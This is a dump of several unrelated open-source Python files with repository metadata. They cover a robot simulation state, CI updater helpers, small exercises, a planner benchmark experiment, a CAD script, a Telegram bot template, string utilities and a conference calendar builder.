Quaternion\n\nclass set_initial_position(EventState):\n\n '''\n Set the intial position of the sub for simulation only\n\n <= continue Indicates completion of the calculation.\n\n '''\n\n def __init__(self, simulation=False):\n \n super(set_initial_position, self).__init__(outcomes=['continue'])\n\n self.set_initial_position_pub = rospy.Publisher('/proc_simulation/start_simulation', Pose, queue_size=2)\n\n self.param_simulation = simulation\n\n def execute(self, userdata):\n if self.param_simulation == True:\n Logger.log('Setting initial condition', Logger.REPORT_HINT)\n pose = Pose()\n pose.position = Point(0.,0.,0.)\n pose.orientation = Quaternion(0.,0.,0.,1)\n self.set_initial_position_pub.publish(pose)\n else:\n Logger.log('Not in simulation. No need for initial condition', Logger.REPORT_HINT)\n return 'continue'\n\n def on_exit(self, userdata):\n pass\n","repo_name":"sonia-auv/sonia-behaviors","sub_path":"sonia_navigation_states/src/sonia_navigation_states/set_initial_position.py","file_name":"set_initial_position.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34903550313","text":"\"\"\"Tools for writing actuators of type updater\"\"\"\n\n\nfrom functools import wraps, partial\nfrom logging import Logger\nimport os\nfrom typing import Callable\n\n\nfrom stdci_libs.git_utils import prep_git_repo, get_name_from_repo_url, commit_files\nfrom stdci_tools.pusher import push_to_scm as push_upstream_sources\nfrom stdci_libs import file_utils\n\nfrom stdci_libs.actuators.common import (\n repo_url_arg,\n refspec_arg,\n target_branch_arg,\n push_map_arg,\n)\nfrom stdci_libs.common_cli import compose_decorators\n\n\n\"\"\"Common CLI for updater scripts\"\"\"\nupdater_cli = compose_decorators(\n repo_url_arg,\n refspec_arg,\n target_branch_arg,\n push_map_arg,\n)\n\n\ndef committing_updater(func: Callable) -> Callable:\n \"\"\"Injects a callable that contains a common updater logic\n\n The purpose of this decorator is to remove the boilerplate code\n that pass the common arguments to updater_main\n\n :param func: The callable to wrap\n \"\"\"\n @wraps(func)\n def committing_updater_func(\n repo_url: str,\n refspec: str,\n target_branch: str,\n push_map: str,\n **kwargs\n ):\n \"\"\"\n For the description about the arguments please look at\n `updater_main`.\n \"\"\"\n updater_main_with_args = partial(\n updater_main,\n repo_url=repo_url,\n refspec=refspec,\n target_branch=target_branch,\n push_map=push_map\n )\n return func(\n committing_updater_func=updater_main_with_args,\n **kwargs\n )\n\n return committing_updater_func\n\n\ndef updater_main(\n repo_url: str,\n refspec: str,\n target_branch: str,\n push_map: str,\n updater_func: Callable[[], None],\n logger: Logger,\n execute_commit: bool = False,\n automerge: bool = False\n):\n \"\"\"Run the actual logic to update the upstream source and push the changes\n\n :param repo_url: midstream repository URL\n :param refspec: refspec to fetch\n :param target_branch: branch to push the changes to\n :param push_map: path to pusher push map\n :param updater_func: A callable that is called with the root of the\n repository as the first argument and run the actual update.\n :param logger: logger instance that will be used to log messages\n :param execute_commit: Apply commit after running the updater func\n :param automerge: Enable automerge in commit message (applicable only\n when execute_commit is set to true).\n \"\"\"\n repo_name = get_name_from_repo_url(repo_url)\n repo_root = os.path.join(os.getcwd(), repo_name)\n logger.info('adding repo url: %s', repo_url)\n _, fetch_sha = prep_git_repo(repo_root, repo_url, refspec, checkout=True)\n with file_utils.workdir(repo_root):\n ret = updater_func()\n if execute_commit:\n add_headers = {}\n if automerge:\n add_headers[\"automerge\"] = \"yes\"\n commit_files(\n [\".\"],\n change_id_headers=[\"x-md5\"],\n add_headers=add_headers\n )\n push_upstream_sources(\n dst_branch=target_branch,\n push_map=push_map,\n if_not_exists=True,\n unless_hash=fetch_sha\n )\n\n return ret\n","repo_name":"oVirt/jenkins","sub_path":"stdci_libs/actuators/updaters.py","file_name":"updaters.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"12891046222","text":"def solution(s):\n answer = True\n \n # [실행] 버튼을 누르면 출력 값을 볼 수 있습니다.\n #print('Hello Python')\n chk1=0\n \n for i in s:\n if chk1==0 and i==')':\n return False\n elif chk1!=0 and i==')':\n chk1-=1\n else:\n chk1+=1\n if chk1!=0:\n return False\n \n return True","repo_name":"Tigerfriend1/Python_algorithm_practice","sub_path":"python/prgLV2_올바른괄호.py","file_name":"prgLV2_올바른괄호.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27665196097","text":"#Напишите код, который выведет на экране все имена полей объекта произвольного пользовательского класса, кроме служебных имен.\n\nclass Object:\n def __init__(self, form, consistency):\n self.form = form\n self.consistency = consistency\n\np = Object(\"Square\", \"Solid\")\nall_names = dir(p)\nprint(all_names)\n\nfield_names = [name for name in all_names if not name.startswith(\"__\")]\nprint(\", \".join(field_names))","repo_name":"SakanaKoi/Python_4sem","sub_path":"Part4/Task1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31004416728","text":"#! /usr/bin/env python\n\nimport os\nimport shutil\n\nimport custom_parser\n\nimport project\n\n\nREPO = project.get_repo_base()\nBENCHMARKS_DIR = os.environ[\"DOWNWARD_BENCHMARKS\"]\nSCP_LOGIN = \"myname@myserver.com\"\nREMOTE_REPOS_DIR = \"/infai/seipp/projects\"\n# If REVISION_CACHE is None, the default \"./data/revision-cache/\" is used.\nREVISION_CACHE = os.environ.get(\"DOWNWARD_REVISION_CACHE\")\nif project.REMOTE:\n SUITE = project.SUITE_SATISFICING\n ENV = project.BaselSlurmEnvironment(email=\"my.name@myhost.ch\")\nelse:\n SUITE = [\"depot:p01.pddl\", \"grid:prob01.pddl\", \"gripper:prob01.pddl\"]\n ENV = project.LocalEnvironment(processes=2)\n\nCONFIGS = [\n (f\"{index:02d}-{h_nick}\", [\"--search\", f\"eager_greedy([{h}])\"])\n for index, (h_nick, h) in enumerate(\n [\n (\"cg\", \"cg(transform=adapt_costs(one))\"),\n (\"ff\", \"ff(transform=adapt_costs(one))\"),\n ],\n start=1,\n )\n]\nBUILD_OPTIONS = []\nDRIVER_OPTIONS = [\"--overall-time-limit\", \"5m\"]\nREV_NICKS = [\n (\"main\", \"\"),\n]\nATTRIBUTES = [\n \"error\",\n \"run_dir\",\n \"search_start_time\",\n \"search_start_memory\",\n \"total_time\",\n \"h_values\",\n \"coverage\",\n \"expansions\",\n \"memory\",\n project.EVALUATIONS_PER_TIME,\n]\n\nexp = project.FastDownwardExperiment(environment=ENV, revision_cache=REVISION_CACHE)\nfor config_nick, config in CONFIGS:\n for rev, rev_nick in REV_NICKS:\n algo_name = f\"{rev_nick}:{config_nick}\" if rev_nick else config_nick\n exp.add_algorithm(\n algo_name,\n REPO,\n rev,\n config,\n build_options=BUILD_OPTIONS,\n driver_options=DRIVER_OPTIONS,\n )\nexp.add_suite(BENCHMARKS_DIR, SUITE)\n\nexp.add_parser(exp.EXITCODE_PARSER)\nexp.add_parser(exp.TRANSLATOR_PARSER)\nexp.add_parser(exp.SINGLE_SEARCH_PARSER)\nexp.add_parser(custom_parser.get_parser())\nexp.add_parser(exp.PLANNER_PARSER)\n\nexp.add_step(\"build\", exp.build)\nexp.add_step(\"start\", exp.start_runs)\nexp.add_step(\"parse\", exp.parse)\nexp.add_fetcher(name=\"fetch\")\n\nif not project.REMOTE:\n exp.add_step(\"remove-eval-dir\", shutil.rmtree, exp.eval_dir, ignore_errors=True)\n project.add_scp_step(exp, SCP_LOGIN, REMOTE_REPOS_DIR)\n\nproject.add_absolute_report(\n exp, attributes=ATTRIBUTES, filter=[project.add_evaluations_per_time]\n)\n\nattributes = [\"expansions\"]\npairs = [\n (\"01-cg\", \"02-ff\"),\n]\nsuffix = \"-rel\" if project.RELATIVE else \"\"\nfor algo1, algo2 in pairs:\n for attr in attributes:\n exp.add_report(\n project.ScatterPlotReport(\n relative=project.RELATIVE,\n get_category=None if project.TEX else lambda run1, run2: run1[\"domain\"],\n attributes=[attr],\n filter_algorithm=[algo1, algo2],\n filter=[project.add_evaluations_per_time],\n format=\"tex\" if project.TEX else \"png\",\n ),\n name=f\"{exp.name}-{algo1}-vs-{algo2}-{attr}{suffix}\",\n )\n\nexp.run_steps()\n","repo_name":"aibasel/lab","sub_path":"examples/downward/2020-09-11-A-cg-vs-ff.py","file_name":"2020-09-11-A-cg-vs-ff.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"74502657447","text":"import ScriptEnv\r\nScriptEnv.Initialize(\"Ansoft.ElectronicsDesktop\")\r\noDesktop.RestoreWindow()\r\noProject = oDesktop.GetActiveProject()\r\noDesign = oProject.GetActiveDesign()\r\noEditor = oDesign.SetActiveEditor(\"3D Modeler\")\r\nunit=oEditor.GetModelUnits()\r\n\r\ndef func(edge):\r\n p0, p1=edge\r\n x0, y0, z0=map(float,p0)\r\n x1, y1, z1=map(float,p1)\r\n p=((x0+x1)/2, (y0+y1)/2, (z0+z1)/2)\r\n v=((x1-x0),(y1-y0),(z1-z0))\r\n return (p,v)\r\n\r\ndef getAll():\r\n objs=[]\r\n totalobjects = oEditor.GetNumObjects()\r\n for i in range(totalobjects):\r\n objs.append(oEditor.GetObjectName(i))\r\n return objs\r\n\r\nedges=oEditor.GetSelections()\r\nAddWarningMessage(str(edges))\r\nedge_vertex=[oEditor.GetVertexIDsFromEdge(float(i[4:])) for i in edges] \r\nvertex_location=[(oEditor.GetVertexPosition(i),oEditor.GetVertexPosition(j)) for i,j in edge_vertex]\r\n\r\nfor p, v in map(func, vertex_location):\r\n old_name=oDesign.GetName()\r\n oProject.CopyDesign(old_name)\r\n oProject.Paste()\r\n oDesign=oProject.GetActiveDesign()\r\n new_name=oDesign.GetName()\r\n\r\n oDesign=oProject.SetActiveDesign(old_name)\r\n oEditor = oDesign.SetActiveEditor(\"3D Modeler\")\r\n oEditor.SetWCS(\r\n [\r\n \"NAME:SetWCS Parameter\",\r\n \"Working Coordinate System:=\", \"Global\",\r\n \"RegionDepCSOk:=\"\t, False\r\n ])\r\n oEditor.CreateRelativeCS(\r\n [\r\n \"NAME:RelativeCSParameters\",\r\n \"Mode:=\"\t\t, \"Axis/Position\",\r\n \"OriginX:=\"\t\t, \"{}{}\".format(p[0],unit),\r\n \"OriginY:=\"\t\t, \"{}{}\".format(p[1],unit),\r\n \"OriginZ:=\"\t\t, \"{}{}\".format(p[2],unit),\r\n \"XAxisXvec:=\"\t\t, \"{}{}\".format(v[0],unit),\r\n \"XAxisYvec:=\"\t\t, \"{}{}\".format(v[1],unit),\r\n \"XAxisZvec:=\"\t\t, \"{}{}\".format(v[2],unit),\r\n \"YAxisXvec:=\"\t\t, \"0mm\",\r\n \"YAxisYvec:=\"\t\t, \"0mm\",\r\n \"YAxisZvec:=\"\t\t, \"1mm\"\r\n ], \r\n [\r\n \"NAME:Attributes\",\r\n \"Name:=\"\t\t, \"cutCS\"\r\n ])\r\n\r\n oEditor.Split(\r\n [\r\n \"NAME:Selections\",\r\n \"Selections:=\"\t\t,','.join(getAll()),\r\n \"NewPartsModelFlag:=\"\t, \"Model\"\r\n ], \r\n [\r\n \"NAME:SplitToParameters\",\r\n \"SplitPlane:=\"\t\t, \"YZ\",\r\n \"WhichSide:=\"\t\t, \"NegativeOnly\",\r\n \"ToolType:=\"\t\t, \"PlaneTool\",\r\n \"ToolEntityID:=\"\t, -1,\r\n \"SplitCrossingObjectsOnly:=\", False,\r\n \"DeleteInvalidObjects:=\", True\r\n ])\r\n #-------------------\r\n\r\n\r\n oDesign=oProject.SetActiveDesign(new_name)\r\n oEditor = oDesign.SetActiveEditor(\"3D Modeler\") \r\n oEditor.SetWCS(\r\n [\r\n \"NAME:SetWCS Parameter\",\r\n \"Working Coordinate System:=\", \"Global\",\r\n \"RegionDepCSOk:=\"\t, False\r\n ])\r\n oEditor.CreateRelativeCS(\r\n [\r\n \"NAME:RelativeCSParameters\",\r\n \"Mode:=\"\t\t, \"Axis/Position\",\r\n \"OriginX:=\"\t\t, \"{}{}\".format(p[0],unit),\r\n \"OriginY:=\"\t\t, \"{}{}\".format(p[1],unit),\r\n \"OriginZ:=\"\t\t, \"{}{}\".format(p[2],unit),\r\n \"XAxisXvec:=\"\t\t, \"{}{}\".format(v[0],unit),\r\n \"XAxisYvec:=\"\t\t, \"{}{}\".format(v[1],unit),\r\n \"XAxisZvec:=\"\t\t, \"{}{}\".format(v[2],unit),\r\n \"YAxisXvec:=\"\t\t, \"0mm\",\r\n \"YAxisYvec:=\"\t\t, \"0mm\",\r\n \"YAxisZvec:=\"\t\t, \"1mm\"\r\n ], \r\n [\r\n \"NAME:Attributes\",\r\n \"Name:=\"\t\t, \"cutCS\"\r\n ])\r\n\r\n oEditor.Split(\r\n [\r\n \"NAME:Selections\",\r\n \"Selections:=\"\t\t,','.join(getAll()),\r\n \"NewPartsModelFlag:=\"\t, \"Model\"\r\n ], \r\n [\r\n \"NAME:SplitToParameters\",\r\n \"SplitPlane:=\"\t\t, \"YZ\",\r\n \"WhichSide:=\"\t\t, \"PositiveOnly\",\r\n \"ToolType:=\"\t\t, \"PlaneTool\",\r\n \"ToolEntityID:=\"\t, -1,\r\n \"SplitCrossingObjectsOnly:=\", False,\r\n \"DeleteInvalidObjects:=\", True\r\n ]) \r\n #---------------------------------\r\n","repo_name":"linmingchih/HowtoSim_Script","sub_path":"cutLine.py","file_name":"cutLine.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"53"} +{"seq_id":"33863572001","text":"import argparse\nimport cv2\nimport numpy as np\nimport time\nfrom PIL import Image, ImageDraw\n\nFPS = 30\nangular_velocity = np.degrees(np.pi) # I'll make 1 rotation per 2 seconds\nstep_angle = angular_velocity / FPS\nstep_radian = np.radians(step_angle)\nmax_count = 3\n\ngif_frames = []\n\ndef save_gif(frames, gifname, speed): #speed 100\n frames[0].save(gifname, format='GIF', append_images=frames[1:], save_all=True, duration=speed, loop=0)\n\ndef process_masking(base, mask, pos):\n h, w, c = mask.shape\n x = pos[0]\n y = pos[1]\n if c == 4:\n mask = cv2.cvtColor(mask, cv2.COLOR_BGRA2BGR) \n img = base.copy()\n bg = img[y:y+h, x:x+w] #overlay area\n try:\n for i in range(0, h):\n for j in range(0, w):\n B = mask[i][j][0]\n G = mask[i][j][1]\n R = mask[i][j][2]\n if (int(B) + int(G) + int(R)):\n bg[i][j][0] = B\n bg[i][j][1] = G\n bg[i][j][2] = R\n img[y:y+h, x:x+w] = bg\n except IndexError:\n print(' index Error')\n return None\n return img\n\ndef delay_fps(s):\n while (time.time() - s < (1.0 / FPS) ):\n time.sleep(0.001)\n\nparser = argparse.ArgumentParser(description=\"OpenCV Example\")\nparser.add_argument(\"--file\", type=str, required=True, help=\"filename of the input image to process\")\nargs = parser.parse_args()\n\n\nmask = cv2.imread(args.file, cv2.IMREAD_COLOR)\nheight, width, channels = mask.shape\nprint(\"image H:%d W:%d, Channel:%d\"%(height, width, channels))\nprint('Angular Velocity:%f step_angle:%f'%(angular_velocity, step_angle))\ncanvas = np.zeros((height * 2, width * 5, 3), np.uint8)\nc_height, c_width, c_channels = canvas.shape\n\nangle = step_angle\nx_pos = c_width - width\ncount = 0\n\nwhile count < max_count:\n matrix = cv2.getRotationMatrix2D((width/2, height/2), angle, 1)\n rotate = cv2.warpAffine(mask, matrix, (width, height))\n s = time.time()\n angle += step_angle\n if(angle > 360):\n angle = 0\n\n print('x_pos:%d'%(x_pos))\n img = process_masking(canvas, rotate, (x_pos,0))\n x_pos -= int(step_radian * height / 2 )\n if c_channels == 4:\n rgb = cv2.cvtColor(img, cv2.COLOR_BGRA2RGB) \n else: \n rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) \n im_pil = Image.fromarray(rgb)\n gif_frames.append(im_pil)\n cv2.imshow('rotate', img)\n if(x_pos < count * width):\n x_pos = c_width - width\n count += 1\n canvas = img.copy()\n k = cv2.waitKey(1)\n delay_fps(s)\n \nsave_gif(gif_frames, \"f:\\\\tmp\\\\bear.gif\", 50)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"raspberry-pi-maker/OpenCV","sub_path":"gif_create.py","file_name":"gif_create.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4941189759","text":"from telebot import TeleBot\n\nimport config\nimport commands\nimport handlers\nfrom call_types import CallTypes\n\nfrom backend.models import BotUser\n\n\nmessage_handlers = {\n '/start': commands.start_command_handler,\n}\n\nkey_handlers = {\n\n}\n\nstate_handlers = {\n\n}\n\nbot = TeleBot(\n token=config.TOKEN,\n num_threads=3,\n parse_mode='HTML',\n)\n\n\ndef create_user(message) -> BotUser:\n return BotUser.objects.create(\n chat_id=message.chat.id,\n first_name=message.chat.first_name,\n last_name=message.chat.last_name,\n username=message.chat.username,\n )\n\n\n@bot.message_handler()\ndef message_handler(message):\n chat_id = message.chat.id\n if not BotUser.objects.filter(chat_id=chat_id).exists():\n create_user(message)\n\n user = BotUser.objects.get(chat_id=chat_id)\n if user.bot_state:\n state_handlers[user.bot_state](bot, message)\n return\n\n for text, handler in message_handlers.items():\n if message.text == text:\n handler(bot, message)\n break\n\n for key, handler in key_handlers.items():\n if message.text in key.getall():\n handler(bot, message)\n break\n\n\ncallback_query_handlers = {\n CallTypes.Language: handlers.language_callback_query_handler,\n}\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_query_handler(call):\n call_type = CallTypes.parse_data(call.data)\n for CallType, handler in callback_query_handlers.items():\n if CallType == call_type.__class__:\n handler(bot, call)\n break\n\n\nif __name__ == \"__main__\":\n # bot.polling()\n bot.infinity_polling()\n","repo_name":"archon1999/TelegramBotTemplate","sub_path":"client/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73717628647","text":"# ------------------------------------------------------------------------------\nimport re, unicodedata\n\n# ------------------------------------------------------------------------------\ncharsIgnore = '.,:;*+=~?%^\\'’\"<>{}[]|\\t\\\\°-'\nfileNameIgnore = charsIgnore + ' $£€/\\r\\n'\nextractIgnore = charsIgnore + '/()'\nalphaRex = re.compile(b'[a-zA-Z]')\nalphanumRex = re.compile(b'[a-zA-Z0-9]')\nalphanum_Rex = re.compile(b'[a-zA-Z0-9_]')\n\ndef normalizeString(s, usage='fileName'):\n '''Returns a version of string p_s whose special chars (like accents) have\n been replaced with normal chars. Moreover, if p_usage is:\n * fileName: it removes any char that can't be part of a file name;\n * alphanum: it removes any non-alphanumeric char;\n * alpha: it removes any non-letter char.\n '''\n strNeeded = isinstance(s, str)\n # We work in unicode. Convert p_s to unicode if not unicode.\n if isinstance(s, str):\n try:\n s = s.decode('utf-8')\n except UnicodeDecodeError:\n # Another encoding may be in use\n s = s.decode('latin-1')\n elif not isinstance(s, unicode): s = unicode(s)\n # For extracted text, replace any unwanted char with a blank\n if usage == 'extractedText':\n res = u''\n for char in s:\n if char not in extractIgnore: res += char\n else: res += ' '\n s = res\n # Standardize special chars like accents\n s = unicodedata.normalize('NFKD', s).encode('ascii', 'ignore')\n # Remove any other char, depending on p_usage\n if usage == 'fileName':\n # Remove any char that can't be found within a file name under Windows\n # or that could lead to problems with LibreOffice.\n res = ''\n for char in s:\n if char not in fileNameIgnore: res += char\n elif usage.startswith('alpha'):\n exec('rex = %sRex' % usage)\n res = ''\n for char in s:\n if rex.match(char): res += char\n elif usage == 'noAccents':\n res = s\n else:\n res = s\n # Re-code the result as a str if a str was given\n if strNeeded: res = res.encode('utf-8')\n return res\n\ndef normalizeText(s, lower=True):\n '''Remove from p_s special chars and lowerize it (if p_lower is True) for\n indexing or other purposes.'''\n r = normalizeString(s, usage='extractedText').strip()\n if lower: r = r.lower()\n return r\n\ndef keepDigits(s):\n '''Returns string p_s whose non-number chars have been removed'''\n if s is None: return s\n res = ''\n for c in s:\n if c.isdigit(): res += c\n return res\n\ndef keepAlphanum(s):\n '''Returns string p_s whose non-alphanum chars have been removed'''\n if s is None: return s\n res = ''\n for c in s:\n if c.isalnum(): res += c\n return res\n\ndef getStringFrom(o):\n '''Returns a string representation for p_o that can be transported over\n HTTP and manipulated in Javascript.'''\n if isinstance(o, dict):\n res = []\n for k, v in o.items():\n res.append(\"%s:%s\" % (getStringFrom(k), getStringFrom(v)))\n return '{%s}' % ','.join(res)\n elif isinstance(o, list) or isinstance(o, tuple):\n return '[%s]' % ','.join([getStringFrom(v) for v in o])\n else:\n if not isinstance(o, basestring): o = str(o)\n return \"'%s'\" % (o.replace(\"'\", \"\\\\'\"))\n\ndef getDictFrom(s):\n '''Returns a dict from string representation p_s of the form\n \"key1:value1,key2:value2\".'''\n res = {}\n if s:\n for part in s.split(','):\n key, value = part.split(':')\n res[key] = value\n return res\n\ndef sadd(s, sub, sep=' '):\n '''Adds sub-string p_sub into p_s, which is a list of sub-strings separated\n by p_sep, and returns the updated string.'''\n if not sub: return s\n if not s: return sub\n elems = set(s.split(sep)).union(set(sub.split(sep)))\n return sep.join(elems)\n\ndef sremove(s, sub, sep=' '):\n '''Removes sub-string p_sub from p_s, which is a list of sub-strings\n separated by p_sep, and returns the updated string.'''\n if not sub: return s\n if not s: return s\n elems = set(s.split(sep))\n for elem in sub.split(sep):\n if elem in elems:\n elems.remove(elem)\n return sep.join(elems)\n\ndef stretchText(s, pattern, char=' '):\n '''Inserts occurrences of p_char within p_s according to p_pattern.\n Example: stretchText(\"475123456\", (3,2,2,2)) returns '475 12 34 56'.'''\n res = ''\n i = 0\n for nb in pattern:\n j = 0\n while j < nb:\n res += s[i+j]\n j += 1\n res += char\n i += nb\n return res\n\n# ------------------------------------------------------------------------------\nclass PasswordGenerator:\n '''Class used to generate passwords'''\n # No \"0\" or \"1\" that could be interpreted as letters \"O\" or \"l\"\n passwordDigits = '23456789'\n # No letters i, l, o (nor lowercase nor uppercase) that could be misread\n passwordLetters = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ'\n\n @classmethod\n def get(k, minLength=5, maxLength=9):\n '''Generates and r_eturns a password whose length is between p_minLength\n and p_maxLength.'''\n # Compute the actual length of the challenge to encode\n length = random.randint(minLength, maxLength)\n r = ''\n for i in range(length):\n j = random.randint(0, 1)\n chars = (j == 0) and k.passwordDigits or k.passwordLetters\n # Choose a char\n r += chars[random.randint(0,len(chars)-1)]\n return r\n\n# ------------------------------------------------------------------------------\ndef lower(s):\n '''French-accents-aware variant of string.lower.'''\n isUnicode = isinstance(s, unicode)\n if not isUnicode: s = s.decode('utf-8')\n res = s.lower()\n if not isUnicode: res = res.encode('utf-8')\n return res\n\ndef upper(s):\n '''French-accents-aware variant of string.upper.'''\n isUnicode = isinstance(s, unicode)\n if not isUnicode: s = s.decode('utf-8')\n res = s.upper()\n if not isUnicode: res = res.encode('utf-8')\n return res\n\n# ------------------------------------------------------------------------------\nclass WhitespaceCruncher:\n '''Takes care of removing unnecessary whitespace in several contexts'''\n whitechars = u' \\r\\t\\n' # Chars considered as whitespace\n allWhitechars = whitechars + u' ' # nbsp\n @staticmethod\n def crunch(s, previous=None):\n '''Return a version of p_s (expected to be a unicode string) where all\n \"whitechars\" are:\n * converted to real whitespace;\n * reduced in such a way that there cannot be 2 consecutive\n whitespace chars.\n If p_previous is given, those rules must also apply globally to\n previous+s.'''\n res = ''\n # Initialise the previous char\n if previous:\n previousChar = previous[-1]\n else:\n previousChar = u''\n for char in s:\n if char in WhitespaceCruncher.whitechars:\n # Include the current whitechar in the result if the previous\n # char is not a whitespace or nbsp.\n if not previousChar or \\\n (previousChar not in WhitespaceCruncher.allWhitechars):\n res += u' '\n else: res += char\n previousChar = char\n # \"res\" can be a single whitespace. It is up to the caller method to\n # identify when this single whitespace must be kept or crunched.\n return res\n# ------------------------------------------------------------------------------\n","repo_name":"lino-framework/appypod","sub_path":"appy/utils/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34969382620","text":"import pandas as pd\nimport re\nimport sys\nimport pytz\nfrom icalendar import vDatetime\nfrom icalendar import Calendar, Event\nfrom datetime import datetime\n\norig_csv = pd.read_csv('../static/csv/ISMIR_all_events - All_Events_Details.csv')\norig_csv = orig_csv.sort_values(by=['Event number (UTC)'])\n\nprint(orig_csv['Category'].unique())\n\nopening_ref_a = 11 #openingA\nopening_ref_b = 20 #openingB\n\ncolor_dict = {\n \"Tutorials\": \"tut\",\n \"All Meeting\": \"all\", # big stuff such as keynotes, business meetings\n \"Poster session\": \"pos\",\n \"Meetup\": \"meet\",\n \"WiMIR Meetup\": \"wimir\",\n \"Meetup-Special\": \"meet-spec\",\n \"Music concert\": \"mus\",\n \"Masterclass\": \"master\",\n \"Satellite\": \"sat\",\n}\n\n# same events different times, via event number field\n\ntutorials_list = [\n [1, 6], # tutorials\n [2, 7],\n [3, 9],\n [4, 8],\n [5, 10],\n [11, 20], # opening\n [68, 77], # business meeting\n]\n\nposters_dict = {\n \"1A\": 1,\n \"2A\": 2,\n \"3A\": 3,\n \"4A\": 4,\n \"5A\": 5,\n \"6A\": 6,\n \"7A\": 7,\n \"8A\": 8,\n \"1B\": 1,\n \"2B\": 2,\n \"3B\": 3,\n \"4B\": 4,\n \"5B\": 5,\n \"6B\": 6,\n \"7B\": 7,\n \"8B\": 8\n}\n\n# print(orig_csv['Event number (UTC)'])\ncal = Calendar()\ncal.add('prodid', 'ISMIR 2020 calendar')\ncal.add('version', '2.0')\ncal['dtstart'] = '20201011T000000'\nevents_meta = {}\n# cal['dtstart'] = '20050404T080000'\n# cal['summary'] = 'Python meeting about calendaring'\n\ndef display(cal):\n return cal.to_ical().replace('\\r\\n', '\\n').strip()\n\n# make tutorials.csv\n\ntut_csv = orig_csv.copy()[orig_csv['Category'].isin([\"Tutorials\", \"All Meeting\"])]\ntut_csv['start_date_b'] = [\"\"] * tut_csv.shape[0]\ntut_csv['start_time_b'] = [\"\"] * tut_csv.shape[0]\n\nfor p in tutorials_list:\n tut_csv.loc[tut_csv['Event number (UTC)'] == p[0], 'start_date_b'] = tut_csv.loc[tut_csv['Event number (UTC)'] == p[1], 'Date (UTC)'].values[0]\n tut_csv.loc[tut_csv['Event number (UTC)'] == p[0], 'start_time_b'] = tut_csv.loc[tut_csv['Event number (UTC)'] == p[1], 'Start time (UTC)'].values[0]\n# print(tut_csv)\n# for p in tutorials_list:\ntut_csv = tut_csv[tut_csv['start_date_b'] != \"\"]\ntut_csv = tut_csv.sort_values(by=['Title'])\n\n# summary is event title\n# location is the link on the calendar\n\nfor index, event in orig_csv.iterrows():\n e_cal = Event()\n e_meta = {}\n\n e_date = [int(x) for x in event['Date (UTC)'].split('-')]\n e_start_time = [int(x) for x in event['Start time (UTC)'].split(':')]\n e_end_time = [int(x) for x in event['End time'].split(':')]\n e_cal.add('uid', int(event['Event number (UTC)']) + 10)\n e_cal.add('dtstamp', datetime(2020,10,1,0,0,0,tzinfo=pytz.utc))\n if event['Event number (UTC)'] == opening_ref_a:\n e_cal['description'] = 'openingA'\n elif event['Event number (UTC)'] == opening_ref_b:\n e_cal['description'] = 'openingB'\n\n if event['Category'] == \"Poster session\":\n session_num = posters_dict[event['Title'].split(\" \")[-1]]\n if any(e in event[\"Title\"] for e in ['LBD']):\n e_cal['location'] = f'lbds.html?session={session_num}'\n elif any(e in event[\"Title\"] for e in ['Ind']):\n e_cal['location'] = f'industry.html?session={session_num}'\n else:\n e_cal['location'] = f'papers.html?session={session_num}'\n\n\n elif event['Category'] == \"Tutorials\":\n e_cal['location'] = f'tutorials.html#{event[\"Title\"][:2]}'\n\n elif event['Category'] == \"Music concert\":\n session_num = posters_dict[event['Title'].split(\" \")[-1]]\n e_cal['location'] = f'music.html?session={session_num}'\n elif event['Category'] == \"Meetup\":\n e_cal['location'] = event['Channel URL']\n\n elif event['Category'] in [\"All Meeting\", \"Meetup-Special\", \"WiMIR Meetup\", \"Masterclass\"]:\n if any(e in event[\"Title\"] for e in ['Opening', \"Business\"]):\n e_cal['location'] = f'day_{event[\"Conf day\"]}.html#{color_dict[event[\"Category\"]] + \"_b\"}'\n else:\n e_cal['location'] = f'day_{event[\"Conf day\"]}.html#{color_dict[event[\"Category\"]]}'\n\n elif event['Category'] == \"Satellite\":\n e_cal['location'] = event['Website link']\n # elif event['Category'] in [\"All Meeting\", \"Meetup\"]:\n # e_cal['location'] = event['Channel URL']\n\n\n e_cal.add('summary', \"#\" + color_dict[event['Category']] + ' ' + event['Title'])\n e_cal.add('dtstart', datetime(e_date[0], e_date[1], e_date[2],\n e_start_time[0], e_start_time[1], 0, tzinfo=pytz.utc))\n if e_end_time[0] < e_start_time[0]:\n e_cal.add('dtend', datetime(e_date[0], e_date[1], e_date[2] + 1,\n e_end_time[0], e_end_time[1], 0, tzinfo=pytz.utc))\n else:\n e_cal.add('dtend', datetime(e_date[0], e_date[1], e_date[2],\n e_end_time[0], e_end_time[1], 0, tzinfo=pytz.utc))\n\n cal.add_component(e_cal)\n\nnew_csv = pd.DataFrame(\n {\"UID\": orig_csv['Event number (UTC)'],\n \"title\": orig_csv['Title'],\n \"day\": orig_csv['Conf day'],\n \"start_date\": orig_csv['Date (UTC)'],\n \"start_time\": orig_csv['Start time (UTC)'],\n \"category\": orig_csv['Category'],\n \"description\": orig_csv['Description'],\n \"organiser\": orig_csv['Organiser'],\n \"web_link\": orig_csv['Website link'],\n \"slack_channel\": orig_csv['Slack 